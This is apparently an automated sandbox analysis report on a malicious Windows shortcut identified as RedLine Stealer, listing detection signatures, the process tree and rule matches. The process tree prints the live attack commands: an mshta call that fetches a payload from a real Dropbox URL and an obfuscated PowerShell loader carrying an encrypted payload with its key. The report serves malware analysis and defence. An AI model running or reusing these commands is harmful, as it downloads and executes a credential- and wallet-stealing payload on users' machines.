Windows Analysis Report: lnker.lnk
Overview
General Information
Detection
Family | Score | Range | Whitelisted | Confidence |
---|---|---|---|---|
RedLine | 100 | 0 - 100 | false | 100% |
Signatures
Antivirus detection for URL or domain
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Windows shortcut file (LNK) starts blacklisted processes
Yara detected RedLine Stealer
.NET source code contains very large array initializations
Drops PE files to the startup folder
Found URL in windows shortcut file (LNK)
Found many strings related to Crypto-Wallets (likely being stolen)
Found suspicious powershell code related to unpacking or dynamic code loading
Machine Learning detection for dropped file
Powershell drops PE file
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious MSHTA Child Process
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Very long command line found
Windows shortcut file (LNK) contains suspicious command line arguments
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to detect virtual machines (SLDT)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Gzip Archive Decode Via PowerShell
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Startup Folder File Write
Stores files to the Windows start menu directory
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match
Classification
- System is w10x64
- forfiles.exe (PID: 2540, MD5: 9BB67AEA5E26CB136F23F29CC48D6B9E)
  cmdline: "C:\Windows\System32\forfiles.exe" /p C:\Windows\Vss /c "powershell start mshta https://dl.dropboxusercontent.com/scl/fi/aur0asu195akuhc7q88lq/mlwr?rlkey=ltpi9kve7882q0vksvvb54han
- conhost.exe (PID: 2812, MD5: 0D698AF330FD17BEE3BF90011D49251D)
  cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
- powershell.exe (PID: 6328, MD5: 04029E121A0CFA5991749937DD22A1D9)
  cmdline: start mshta https://dl.dropboxusercontent.com/scl/fi/aur0asu195akuhc7q88lq/mlwr?rlkey=ltpi9kve7882q0vksvvb54han
- mshta.exe (PID: 2492, MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
  cmdline: "C:\Windows\system32\mshta.exe" https://dl.dropboxusercontent.com/scl/fi/aur0asu195akuhc7q88lq/mlwr?rlkey=ltpi9kve7882q0vksvvb54han
- powershell.exe (PID: 1900, MD5: 04029E121A0CFA5991749937DD22A1D9)
  cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $xRnrtl = 'AAAAAAAAAAAAAAAAAAAAAD0Af5kmiW2Hnx1ert6ZiHkcrCG5xRw5g+RXkvjSvgaUbk+srbVrOsQgn8toO+hu0Qw1KQj7FAk5xMoqfeLJjMEeamlWrF3FTQ6in6FDMU0esWs41x91rJ/vkrJQOkHUMM2MmLD03n+lBrw2YeIcINOqvu4GIVPjd+Fis/QpUW5Fj8iNCDQy7bTeb/cl1K0KC1ocqAlvj83iKlmuvdzxPum6cIQxLt+2YLh6fmAQocUETi+pQw294/BrcWHiPbCLQ3IVN1QFO/QcDcgmCGGhLZSmlSKvXWS4pkFTnsaeCv0q8qpFQPIbBpzGkWGBKxMJYhQh81lXHyPxeOeFyFq6jqW2vUm+uqMCwX1N5g5UHXYw3Qg4zpyOCq0I5EwoDqzACg0FQ7NLbZAuwhTLK+Yu1JUpq7a86i+FRnVjkA9yOJMjUROJtiOoDNfMdo0ej8BzSKoid4bytekfnZGfb1xfEAyrNCki102wWcJK/vZZFJJQ0EWOmR4qPclxZ3kj3QXa7iwBBn/xEMGg8xE8RDWaHfXHZqdxlpnoKmQX6CchYBPK5Q/alHBAM5gOIN5RcmnQecgz+itBcGKRKac4QUIuYCsTNOGFGvc0/93UPNG9W8OrCD+b24Y2bZP/KolyWolNdjJRHwp4RJAA9iJshbpdMe4n95z2TmNVPEVN28sDZ0kfiJCKpkbu1TkpQNSnY46SLTiZTT3ajO8Sox/hCnztghhj4DMhfQfHJBcMyZ1yynlBM+7lNgUyvioQxQ2KPY7KDi7JTpk1iQYGc+oBvO/fWUMtz9kzyEyxJpOGkwI3MMjDpUYIc9iprfEHj8hpwVdPjhcenIyhZqn28939MlitHffq24shDMzCPgjnU9OWPsMhEKvfu34pU/yjbMkwLHEjcQ==';$PWFaA = 'd0hDTktlemN0SlFHRXFla0Rjb094cnRoUGlSR050VmI=';$rtbrSxS = New-Object 'System.Security.Cryptography.AesManaged';$rtbrSxS.Mode = [System.Security.Cryptography.CipherMode]::ECB;$rtbrSxS.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$rtbrSxS.BlockSize = 128;$rtbrSxS.KeySize = 256;$rtbrSxS.Key = [System.Convert]::FromBase64String($PWFaA);$jIXAy = [System.Convert]::FromBase64String($xRnrtl);$rSpXWojt = $jIXAy[0..15];$rtbrSxS.IV = $rSpXWojt;$mXooDLjjw = $rtbrSxS.CreateDecryptor();$KHnzkbgXQ = $mXooDLjjw.TransformFinalBlock($jIXAy, 16, $jIXAy.Length - 16);$rtbrSxS.Dispose();$iIauy = New-Object System.IO.MemoryStream( , $KHnzkbgXQ );$Izyrh = New-Object System.IO.MemoryStream;$thcRRYmqg = New-Object System.IO.Compression.GzipStream $iIauy, ([IO.Compression.CompressionMode]::Decompress);$thcRRYmqg.CopyTo( $Izyrh );$thcRRYmqg.Close();$iIauy.Close();[byte[]] $QWoIKfh = $Izyrh.ToArray();$KKSHrJAF = [System.Text.Encoding]::UTF8.GetString($QWoIKfh);$KKSHrJAF | powershell -
- conhost.exe (PID: 6352, MD5: 0D698AF330FD17BEE3BF90011D49251D)
  cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
- powershell.exe (PID: 7220, MD5: 04029E121A0CFA5991749937DD22A1D9)
  cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -
- WmiPrvSE.exe (PID: 7404, MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
  cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
- driver.exe (PID: 7648, MD5: 80B60930BD4A6F65F57F3A2F40CCC6F7)
  cmdline: "C:\Users\user\AppData\Roaming\driver.exe"
- conhost.exe (PID: 7672, MD5: 0D698AF330FD17BEE3BF90011D49251D)
  cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
- qemu-ga.exe (PID: 4460, MD5: A5CE3ABA68BDB438E98B1D0C70A3D95C)
  cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe"
- svchost.exe (PID: 6520, MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
- OpenWith.exe (PID: 7756, MD5: E4A834784FA08C17D47A1E72429C5109)
  cmdline: C:\Windows\system32\OpenWith.exe -Embedding
- qemu-ga.exe (PID: 7580, MD5: A5CE3ABA68BDB438E98B1D0C70A3D95C)
  cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe"
- cleanup
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
RedLine Stealer | RedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer. | No Attribution | | |
No configs have been found.
Rule | Description | Author |
---|---|---|
JoeSecurity_RedLine_1 | Yara detected RedLine Stealer | Joe Security |
JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |

Rule | Description | Author |
---|---|---|
JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |

Rule | Description | Author |
---|---|---|
INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
System Summary |
---|
Source: | Author: Florian Roth (Nextron Systems) |